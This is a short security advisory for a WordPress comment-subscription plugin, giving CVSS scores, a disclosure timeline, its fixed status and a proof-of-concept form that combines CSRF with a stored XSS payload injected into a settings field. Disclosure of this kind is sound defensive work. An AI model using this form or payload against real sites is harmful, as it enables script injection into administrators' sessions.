Advisory:

Stored XSS and CSRF vulnerabilities in Subscribe To Comments Reloaded 140129

Vulnerability

Last revised:

This plugin contains a combination XSS/CSRF vulnerability. Because the XSS is stored, browsers like Chrome which implement anti-XSS measures are equally at risk.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 6.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Entice an administrative user to submit the following form:

<form action="http://localhost/wp-admin/admin.php?page=subscribe-to-comments-reloaded/options/index.php&subscribepanel=3" method="post">
  <input type="text" name="options[manager_page]" id="manager_page" value="&quot;><script>alert(1)</script>">
  <input type="submit">
</form>

An alert will be displayed on this plugin’s settings page.

Advisory timeline

  • 2014-02-04: Identified
  • 2014-02-18: Reported to plugins@wordpress.org
  • 2014-03-10: Updated version discovered which reports this issue fixed.

Mitigation/further actions

Upgrade immediately.